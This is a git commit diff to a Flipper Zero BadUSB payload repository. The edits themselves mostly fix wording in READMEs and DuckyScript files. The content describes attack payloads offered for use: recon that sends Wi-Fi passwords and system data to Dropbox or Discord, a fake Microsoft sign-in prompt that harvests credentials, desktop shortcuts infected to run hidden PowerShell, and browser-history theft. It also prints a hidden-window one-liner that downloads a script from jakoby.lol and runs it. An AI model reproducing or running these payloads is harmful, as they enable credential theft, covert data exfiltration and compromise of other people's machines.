commit
5d0fd64f70
39 changed files with 99 additions and 99 deletions
|
@ -19,13 +19,13 @@
|
|||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
This is an advanced recon of a target PC and exfiltration of that data
|
||||
This is an advanced recon of a target PC and exfiltration of that data.
|
||||
.DESCRIPTION
|
||||
This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running
|
||||
All of the gather information is formatted neatly and output to a file
|
||||
That file is then exfiltrated to cloud storage via DropBox
|
||||
This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running.
|
||||
All of the gather information is formatted neatly and output to a file.
|
||||
That file is then exfiltrated to cloud storage via Dropbox.
|
||||
.Link
|
||||
https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads
|
||||
https://developers.dropbox.com/oauth-guide # Guide for setting up your Dropbox for uploads
|
||||
https://www.youtube.com/watch?v=Zs-1j42ySNU # My youtube tutorial on Discord Uploads
|
||||
https://www.youtube.com/watch?v=VPU7dFzpQrM # My youtube tutorial on Dropbox Uploads
|
||||
#>
|
||||
|
|
|
@ -2,7 +2,7 @@ REM Title: ADV-Recon
|
|||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This payload is meant to do an advanced recon of the targets PC. See README.md file for more details.
|
||||
REM Description: This payload is meant to do an advanced recon of the target's PC. See README.md file for more details.
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
|
@ -10,4 +10,3 @@ GUI r
|
|||
DELAY 500
|
||||
STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex
|
||||
ENTER
|
||||
|
||||
|
|
|
@ -15,7 +15,7 @@
|
|||
|
||||
# ADV-Recon
|
||||
|
||||
A script used to do an advanced level of Recon on the targets computer.
|
||||
A script used to do an advanced level of recon on the target's computer.
|
||||
|
||||
Version 2 no longer requires you to host your own version of the script.
|
||||
|
||||
|
@ -25,11 +25,11 @@ Modifying the execution script is the only necessary interaction.
|
|||
|
||||
This program enumerates a target PC to collect as much recon data as possible for future engagements. This includes:
|
||||
|
||||
* Hosts Powershell Version (to know what commands can be run)
|
||||
* Name Associated with their Microsoft Account (Or ENV UserName variable if one is not detected)
|
||||
* Hosts PowerShell Version (to know what commands can be run)
|
||||
* Name associated with their Microsoft account (Or ENV UserName variable if one is not detected)
|
||||
* Whether they are in the Admin group or not
|
||||
* The email associated with their Microsoft Account (for phishing possibilities)
|
||||
* Other User accounts on their system (for possible privledge escalation)
|
||||
* The email associated with their Microsoft account (for phishing possibilities)
|
||||
* Other User accounts on their system (for possible privilege escalation)
|
||||
* Details on their login settings (Ex: Min/Max password age and length)
|
||||
* How many days since they have changed their password (Max password age - Days since = Opportunity)
|
||||
* Their GeoLocation (know their approximate where abouts)
|
||||
|
@ -39,7 +39,7 @@ This program enumerates a target PC to collect as much recon data as possible fo
|
|||
* Network Interfaces (What are they connecting in and out with)
|
||||
* System Information (Manufacturer, Model, Serial Number, OS, CPU, RAM, Mainboard BIOS)
|
||||
* Local Users (Accounts on system with Username, name associated with microsoft account and SID)
|
||||
* Information on their HardDrives (Indicator of Recon Scope)
|
||||
* Information on their hard drives (Indicator of Recon Scope)
|
||||
* COM and Serial Devices (Is there a device connected you can manipulate?)
|
||||
* Active TCP Connections (Poor mans Port Scanning)
|
||||
* Processes, Services, Software, and Drivers (What is running on the computer we can exploit?)
|
||||
|
@ -50,7 +50,7 @@ This program enumerates a target PC to collect as much recon data as possible fo
|
|||
|
||||
### Dependencies
|
||||
|
||||
* DropBox or Discord
|
||||
* Dropbox or Discord
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
|
|
@ -2,8 +2,8 @@ REM Title: ADV-RickRoll
|
|||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This is a one liner payload that will Rick Roll your target. Video will be played a full screen and max volume.
|
||||
REM Upon deployment payload will pause until a mouse movement is detected and run once one is.
|
||||
REM Description: This is a one liner payload that will Rick Roll your target. Video will be played at full screen and max volume.
|
||||
REM Upon deployment, payload will pause until a mouse movement is detected and run once one is.
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
|
|
|
@ -23,7 +23,7 @@
|
|||
|
||||
# ADV-RickRoll
|
||||
|
||||
A script used to do an advanced rick roll on your target
|
||||
A script used to do an advanced rick roll on your target.
|
||||
|
||||
## Description
|
||||
|
||||
|
|
|
@ -15,17 +15,17 @@
|
|||
|
||||
# Acid Burn
|
||||
|
||||
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
|
||||
A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
|
||||
|
||||
## Description
|
||||
|
||||
This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
|
||||
This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with the Microsoft account.
|
||||
The SSID and WiFi password of any current or previously connected to networks.
|
||||
It determines the last day they changed thier password and how many days ago.
|
||||
Once the information is gathered the script will pause until a mouse movement is detected
|
||||
Then the script uses Sapi speak to roast their set up and lack of security
|
||||
If wifi networks and passwords are detected wallpaper will be changed to image displaying that information
|
||||
Image generated will be saved to desktop, steganography is used to put hidden message at bottom of binary output of image generated
|
||||
It determines the last day they changed their password and how many days ago.
|
||||
Once the information is gathered, the script will pause until a mouse movement is detected.
|
||||
Then, the script uses Sapi speak to roast their set up and lack of security.
|
||||
If wifi networks and passwords are detected, the wallpaper will be changed to an image displaying that information.
|
||||
The generated image will be saved to the desktop and steganography is used to put a hidden message at the bottom of the binary output of the generated image.
|
||||
|
||||
## Getting Started
|
||||
|
||||
|
|
|
@ -22,9 +22,9 @@
|
|||
|
||||
## Description
|
||||
|
||||
This payload can be used to retrieve the browsing history and bookmarks from edge, chrome, and firefox (no bookmarks from firefox currently)
|
||||
This payload can be used to retrieve the browsing history and bookmarks from Edge, Chrome, Opera GX, and Firefox (no bookmarks from firefox currently).
|
||||
|
||||
They are then exfiled using either discord or dropbox
|
||||
They are then exfiled using either Discord or Dropbox.
|
||||
|
||||
## The Function
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ REM Title: Browser-Data
|
|||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This payload will grab your targets brosing history and bookmarks from IE, Chrome, and Firefox
|
||||
REM Description: This payload will grab your targets brosing history and bookmarks from IE, Chrome, Firefox, and Opera GX.
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
|
|
|
@ -2,7 +2,9 @@ REM Title: Credz-Plz
|
|||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This payload is meant to prompt the target to enter their creds to later be exfiltrated with dropbox. See README.md file for more details.
|
||||
REM Description: This payload prompts the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook.
|
||||
|
||||
REM See README.md file for more details.
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
|
|
|
@ -25,7 +25,7 @@
|
|||
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
|
||||
This will be followed by a fake authentication ui prompt.
|
||||
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
|
||||
Once the target enters their credentials their information will be uploaded to your dropbox for collection
|
||||
Once the target enters their credentials their information will be uploaded to either your Dropbox or Discord webhook for collection
|
||||
|
||||
.Link
|
||||
https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads
|
||||
|
|
|
@ -15,18 +15,18 @@
|
|||
|
||||
# Credz-Plz
|
||||
|
||||
A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.
|
||||
A script used to prompt the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook.
|
||||
|
||||
## Description
|
||||
|
||||
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account".
|
||||
This will be followed by a fake authentication ui prompt.
|
||||
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up.
|
||||
Once the target enters their credentials their information will be uploaded to your dropbox for collection.
|
||||
Once the target enters their credentials their information will be uploaded to your Dropbox or Discord webhook for collection.
|
||||
|
||||

|
||||

|
||||
|
||||

|
||||

|
||||
|
||||
## Getting Started
|
||||
|
||||
|
|
BIN
Payloads/Flip-Credz-Plz/authentication.jpg
Normal file
BIN
Payloads/Flip-Credz-Plz/authentication.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 140 KiB |
Binary file not shown.
Before Width: | Height: | Size: 73 KiB After Width: | Height: | Size: 184 KiB |
Binary file not shown.
Before Width: | Height: | Size: 39 KiB |
|
@ -23,7 +23,7 @@
|
|||
|
||||
# JumpScare 2.0
|
||||
|
||||
A script used to jumpscare your target
|
||||
A script used to jumpscare your target.
|
||||
|
||||
## Description
|
||||
|
||||
|
@ -31,7 +31,7 @@ This script will jumpscare your target.
|
|||
|
||||
A jumpscare video will be downloaded to their temp directory.
|
||||
|
||||
When a mouse movement is detected that video will be played in the powershell console at max volume and fullscreen.
|
||||
When a mouse movement is detected, that video will be played in the PowerShell console at max volume and fullscreen.
|
||||
|
||||
## Getting Started
|
||||
|
||||
|
|
|
@ -15,7 +15,7 @@
|
|||
|
||||
# JumpScare
|
||||
|
||||
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
|
||||
A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
|
||||
|
||||
## Description
|
||||
|
||||
|
|
|
@ -23,7 +23,7 @@
|
|||
|
||||
# Must Sub
|
||||
|
||||
A script used to get your target to subscribe to 15 of my favorite hacker youtube channels
|
||||
A script used to get your target to subscribe to 15 of my favorite hacker YouTube channels.
|
||||
|
||||
## Description
|
||||
|
||||
|
|
|
@ -15,20 +15,20 @@
|
|||
|
||||
# PS-Draw
|
||||
|
||||
A script used to generate and draw images in the Powershell Window, used to leave a signature or perhaps taunt victims
|
||||
A script used to generate and draw images in the PowerShell window, used to leave a signature or perhaps taunt victims.
|
||||
|
||||
## Description
|
||||
|
||||
These two programs use two different method to draw out images in the Powershell Window.
|
||||
These two programs use two different methods to draw out images in the PowerShell window.
|
||||
|
||||
PS-Draw will convert an image you download into a BMP file, estimate the colors used based off the 16 available powershell colors,
|
||||
then draw your image out in the powershell window. This process is not exact and needs testing of multiple images to find one that works well.
|
||||
then draw your image out in the PowerShell window. This process is not exact and needs testing of multiple images to find one that works well.
|
||||
|
||||
PS-Custom-Draw generates images to be drawn in the Powershell Window based off pre-configured arrays I put together already included in the file itself.
|
||||
PS-Custom-Draw generates images to be drawn in the PowerShell window based off pre-configured arrays I put together already included in the file itself.
|
||||
These images look significantly cleaner due to the fact they were drawn and coded specifically for this purpose.
|
||||
|
||||
After the images are generated, a greeting will be generated by grabbing either the name associated with the registered Microsoft account or the
|
||||
UserName environment variable. The script will then be paused until a mouse movement is detected at which time the pre-selected image will be drawn out in the powershell window.
|
||||
UserName environment variable. The script will then be paused until a mouse movement is detected at which time the pre-selected image will be drawn out in the PowerShell window.
|
||||
|
||||
## Getting Started
|
||||
|
||||
|
|
|
@ -15,13 +15,13 @@
|
|||
|
||||
# PineApple
|
||||
|
||||
A script used to connect a targets PC to your wifi PineApple
|
||||
A script used to connect a targets PC to your Wifi PineApple.
|
||||
|
||||
## Description
|
||||
|
||||
This program will generate an XML file that will be used to create a network profile for your Wifi PineApple.
|
||||
The XML file will be manually entered into a Powershell window.
|
||||
The Powershell window and run box will be erased for a clean exit.
|
||||
The XML file will be manually entered into a PowerShell window.
|
||||
The PowerShell window and run box will be erased for a clean exit.
|
||||
|
||||
## Getting Started
|
||||
|
||||
|
|
|
@ -15,14 +15,14 @@
|
|||
|
||||
# Play-WAV
|
||||
|
||||
A script used to download a WAV file and play it after a mouse movement is detected
|
||||
A script used to download a WAV file and play it after a mouse movement is detected.
|
||||
|
||||
## Description
|
||||
|
||||
This program starts off by using an Invoke-WebRequest to download a WAV file.
|
||||
The system volume is then turned up to the max level.
|
||||
Then the script will be paused until a mouse movement is detected.
|
||||
After one is the WAV file will be played.
|
||||
After a mouse movement is detected, the WAV file will be played.
|
||||
|
||||
## Getting Started
|
||||
|
||||
|
@ -34,7 +34,7 @@ After one is the WAV file will be played.
|
|||
|
||||
### Executing program
|
||||
|
||||
* Place the WAV Url in the $wav variable
|
||||
* Place the WAV URL in the $wav variable
|
||||
* Plug in your device
|
||||
* Invoke-WebRequest will be entered in the Run Box to download your WAV file
|
||||
|
||||
|
|
|
@ -15,11 +15,11 @@
|
|||
|
||||
# Rage-PopUps
|
||||
|
||||
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
|
||||
A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
|
||||
|
||||
## Description
|
||||
|
||||
This program will open a series of pop up boxes with insults in a loop that repeats as many times as you set it to.
|
||||
This program will open a series of pop-up boxes with insults in a loop that repeats as many times as you set it to.
|
||||
There is a section in the Rage-PopUps.ps1 file where you insert your own insults or use the ones provided.
|
||||
|
||||
## Getting Started
|
||||
|
|
|
@ -19,10 +19,10 @@
|
|||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
This script will open a series of pop ups in order to taunt your target. I wrote it initially to target call center scammers
|
||||
This script will open a series of pop-ups in order to taunt your target. I wrote it initially to target call center scammers.
|
||||
|
||||
.DESCRIPTION
|
||||
This program is to taunt your target. Below are a series insults you can modify as you like. The program will generate a PopUp
|
||||
This program is meant to taunt your target. Below are a series insults you can modify as you like. The program will generate a Pop-up
|
||||
for each one of them.
|
||||
#>
|
||||
|
||||
|
|
|
@ -30,23 +30,23 @@
|
|||
<br>YouTube Tutorial
|
||||
</p>
|
||||
|
||||
A script used to embed malware in the shortcut on your targets desktop
|
||||
A script used to embed malware in the shortcut on your target's desktop.
|
||||
|
||||
## Description
|
||||
|
||||
This payload will run a powershell script in the background of any shortcut used on the targets desktop.
|
||||
This payload will run a PowerShell script in the background of any shortcut used on the target's desktop.
|
||||
|
||||
This is done by taking advantage of the `Target` field where powershell commands can be stored or run.
|
||||
This is done by taking advantage of the `Target` field where PowerShell commands can be stored or run.
|
||||
|
||||
This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the `$code` variable and it will still run.
|
||||
|
||||
So if your command exceeds that consider using an IWR function to download and execute a longer script.
|
||||
So if your command exceeds that, consider using an IWR function to download and execute a longer script.
|
||||
|
||||
I have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13)
|
||||
|
||||
<img src="https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/Assets/Shortcut-Jacker/properties.jpg" width="300">
|
||||
|
||||
Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the powershell code you want executed is stored.
|
||||
Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the PowerShell code you want executed is stored.
|
||||
|
||||
---------------------------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
|
@ -60,7 +60,7 @@ Using the `Get-Shortcut` function we will get the following information we can t
|
|||
|
||||
## Getting Started
|
||||
|
||||
Once the script is executed all of the shortcuts on your target's desktop will be infected with the powershell code you have stored in the `$code` variable in the .ps1 file
|
||||
Once the script is executed, all of the shortcuts on your target's desktop will be infected with the PowerShell code you have stored in the `$code` variable in the .ps1 file
|
||||
|
||||
### Dependencies
|
||||
|
||||
|
|
|
@ -19,12 +19,12 @@
|
|||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
This is payload used to inject powershell code into shortcuts
|
||||
This is payload used to inject PowerShell code into shortcuts.
|
||||
|
||||
.DESCRIPTION
|
||||
This payload will gather information on the shortcuts on your targets desktop
|
||||
That data will then be manipulated to embed a powershell script
|
||||
This script will be ran in the background when the short cut is
|
||||
This payload will gather information on the shortcuts on your targets desktop.
|
||||
That data will then be manipulated to embed a PowerShell script.
|
||||
This script will be ran in the background when the short cut is.
|
||||
|
||||
#>
|
||||
|
||||
|
@ -32,7 +32,7 @@
|
|||
|
||||
<#
|
||||
.NOTES
|
||||
The powershell code stored in this variable is what will run in the background
|
||||
The PowerShell code stored in this variable is what will run in the background.
|
||||
This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code
|
||||
variable and it will still run.
|
||||
#>
|
||||
|
|
|
@ -15,11 +15,11 @@
|
|||
|
||||
# Subscribe
|
||||
|
||||
A script I put together to make your target subscribe to your youtube channel
|
||||
A script I put together to make your target subscribe to your YouTube channel.
|
||||
|
||||
## Description
|
||||
|
||||
This script is set to open your youtube account in their browser where they will be prompted to subscribe to you.
|
||||
This script is set to open your YouTube account in their browser where they will be prompted to subscribe to you.
|
||||
SPOILER: They do.
|
||||
|
||||
## Getting Started
|
||||
|
@ -27,7 +27,7 @@ SPOILER: They do.
|
|||
### Dependencies
|
||||
|
||||
* Windows 10,11
|
||||
* Your target will have to be signed into their youtube account
|
||||
* Your target will have to be signed into their YouTube account
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
|
|
|
@ -19,11 +19,11 @@
|
|||
|
||||
<#
|
||||
.DESCRIPTION
|
||||
This program is designed to get your target to subscribe to your youtube channel
|
||||
This program is designed to get your target to subscribe to your YouTube channel.
|
||||
#>
|
||||
#############################################################################################################################################
|
||||
|
||||
# Enter your youtube channel URL here, ONLY if you are rehosting this script yourself
|
||||
# Enter your YouTube channel URL here, ONLY if you are rehosting this script yourself
|
||||
|
||||
# $channel = "https://www.youtube.com/iamjakoby"
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ REM Title: Subscribe
|
|||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This payload is meant to make your target subscribe to your youtube channel
|
||||
REM Description: This payload is meant to make your target subscribe to your YouTube channel
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
|
|
|
@ -15,13 +15,13 @@
|
|||
|
||||
# Wallpaper-URL
|
||||
|
||||
This payload will download an image from any URL and set it as the targets wallpaper
|
||||
This payload will download an image from any URL and set it as the target's wallpaper.
|
||||
|
||||
## Description
|
||||
|
||||
Use this program to troll your friends. Find any image online and grab the url and insert it into the PS1 script.
|
||||
Use this program to troll your friends. Find any image online and grab the URL and insert it into the PS1 script.
|
||||
Run this payload and step away. Once a mouse movement is detected, their wallpaper will change right in front of their eyes.
|
||||
Lastly, to clean up your tracks behind you, the tmp folder will be emptied and the powershell and run box history will be wiped
|
||||
Lastly, to clean up your tracks behind you, the tmp folder will be emptied and the PowerShell and run box history will be wiped.
|
||||
|
||||
|
||||
## Getting Started
|
||||
|
|
|
@ -15,7 +15,7 @@
|
|||
|
||||
# Wallpaper-Troll
|
||||
|
||||
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
|
||||
A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
|
||||
|
||||
## Description
|
||||
|
||||
|
|
|
@ -21,10 +21,10 @@
|
|||
|
||||
.DESCRIPTION
|
||||
This program gathers details from target PC to include name associated with the microsoft account, their latitude and longitude,
|
||||
Public IP, and and the SSID and WiFi password of any current or previously connected to networks.
|
||||
It will take the gathered information and generate a .jpg with that information on show
|
||||
Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned
|
||||
Additionally a secret message will be left in the binary of the wallpaper image generated and left on their desktop
|
||||
Public IP, the SSID, and WiFi password of any current or previously connected to networks.
|
||||
It will take the gathered information and generate a .jpg with that information on show.
|
||||
Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned.
|
||||
Additionally, a secret message will be left in the binary of the wallpaper image generated and left on their desktop.
|
||||
#>
|
||||
#############################################################################################################################################
|
||||
|
||||
|
|
|
@ -2,11 +2,11 @@ REM Title: Wallpaper-Troll
|
|||
REM
|
||||
REM Author: I am Jakoby
|
||||
REM
|
||||
REM Description: This payload is meant to taunt your target with a revealing wallpaper. See README.md for more details
|
||||
REM Description: This payload is meant to taunt your target with a revealing wallpaper. See README.md for more details.
|
||||
REM
|
||||
REM Target: Windows 10, 11
|
||||
REM
|
||||
REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload
|
||||
REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload.
|
||||
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
|
||||
REM
|
||||
REM --------------------------------------------------------------------------------------
|
||||
|
|
|
@ -2,7 +2,7 @@ REM Title: We-Found-You
|
|||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This payload is meant to open a map in your targets web browser with their current location
|
||||
REM Description: This payload is meant to open a map in your target's web browser with their current location.
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
|
|
|
@ -19,17 +19,17 @@
|
|||
|
||||
<#
|
||||
.NOTES
|
||||
The targets Location Services must be turned on or this payload will not work
|
||||
The target's Location Services must be turned on or this payload will not work.
|
||||
|
||||
.SYNOPSIS
|
||||
This script will get the users location and open a map of where they are in their browser and use windows speech to declare you know where they are
|
||||
This script will get the user's location and open a map of where they are in their browser and use Windows speech to declare you know where they are.
|
||||
|
||||
.DESCRIPTION
|
||||
This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
|
||||
This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with their Microsoft account.
|
||||
The SSID and WiFi password of any current or previously connected to networks.
|
||||
It determines the last day they changed their password and how many days ago.
|
||||
Once the information is gathered the script will pause until a mouse movement is detected
|
||||
Then the script uses Sapi speak to roast their set up and lack of security
|
||||
Once the information is gathered, the script will pause until a mouse movement is detected.
|
||||
Then the script uses Sapi speak to roast their set up and lack of security.
|
||||
#>
|
||||
|
||||
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
@ -37,7 +37,7 @@
|
|||
<#
|
||||
|
||||
.NOTES
|
||||
This is to get the Name associate with the targets microsoft account, if not detected UserName will be used
|
||||
This is to get the name associated with the targets Microsoft account, if not detected UserName will be used.
|
||||
#>
|
||||
|
||||
function Get-fullName {
|
||||
|
|
|
@ -17,7 +17,7 @@
|
|||
|
||||
## Description
|
||||
|
||||
This payload grabs your targets wifi passwords and uploads them to either Dropbox, Discord, or both
|
||||
This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both.
|
||||
|
||||
## Getting Started
|
||||
|
||||
|
@ -30,9 +30,9 @@ This payload grabs your targets wifi passwords and uploads them to either Dropbo
|
|||
* Plug in your device
|
||||
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
||||
|
||||
`$dc` is the variable that stores your discord webhook
|
||||
`$dc` is the variable that stores your Discord webhook
|
||||
|
||||
`$db` is the variable that stores your dropbox token
|
||||
`$db` is the variable that stores your Dropbox token
|
||||
|
||||
Fill in either or both of these to methods to exfil your collected data
|
||||
|
||||
|
|
|
@ -7,7 +7,7 @@ $wifiProfiles > $env:TEMP/--wifi-pass.txt
|
|||
|
||||
############################################################################################################################################################
|
||||
|
||||
# Upload output file to dropbox
|
||||
# Upload output file to Dropbox
|
||||
|
||||
function DropBox-Upload {
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@ REM Title: Wifi Grabber
|
|||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This payload grabs your targets wifi passwords and uploads them to either Dropbox, Discord, or both
|
||||
REM Description: This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both.
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
|
|
|
@ -23,14 +23,14 @@
|
|||
|
||||
# YouTube Tripwire
|
||||
|
||||
Plays any YouTube video after a mouse movement is detected
|
||||
Plays any YouTube video after a mouse movement is detected.
|
||||
|
||||
## Description
|
||||
|
||||
This script is a one liner that can fit in the runbox by itself.
|
||||
Just replace the URL for the Youtube video and run it.
|
||||
Just replace the URL for the YouTube video and run it.
|
||||
You can now unplug your device and walk away.
|
||||
When your target returns and moves their mouse the video will start playing full screen.
|
||||
When your target returns and moves their mouse, the video will start playing full screen.
|
||||
|
||||
## Getting Started
|
||||
|
||||
|
|
|
@ -1,7 +1,6 @@
|
|||
REM Title: YouTube-TripWire
|
||||
REM Author: I am Jakoby
|
||||
REM Description: Plays any YouTube video after a mouse movement is detected
|
||||
REM Replace URL with your own
|
||||
REM Description: Plays any YouTube video after a mouse movement is detected. (Replace URL with your own)
|
||||
REM Target: Windows 10, 11
|
||||
GUI r
|
||||
DELAY 500
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
# 🐬 Flipper-Zero-BadUSB 🐬
|
||||
|
||||
If you would like to support the work that I do please consider becoming a subscriber in our Discord
|
||||
If you would like to support the work that I do, please consider becoming a subscriber in our Discord.
|
||||
|
||||
[SUBSCRIBE](https://jakoby.lol/tah)
|
||||
|
||||
|
@ -53,9 +53,9 @@ Subscribing to my YouTube would also be really appreciated.
|
|||
|
||||
This repository has been optimized to facilitate plug and play functionality.
|
||||
|
||||
I purchased the domain `jakoby.lol` for the sole purpose of creating my own short URLs
|
||||
I purchased the domain `jakoby.lol` for the sole purpose of creating my own short URLs.
|
||||
|
||||
I did this with the intention of making room for discord webhooks and dropbox tokens to fit in my one liners
|
||||
I did this with the intention of making room for discord webhooks and dropbox tokens to fit in my one liners.
|
||||
|
||||
This in turn makes it so the user no longer has to host their own version of the script.
|
||||
|
||||
|
|
Loading…
Reference in a new issue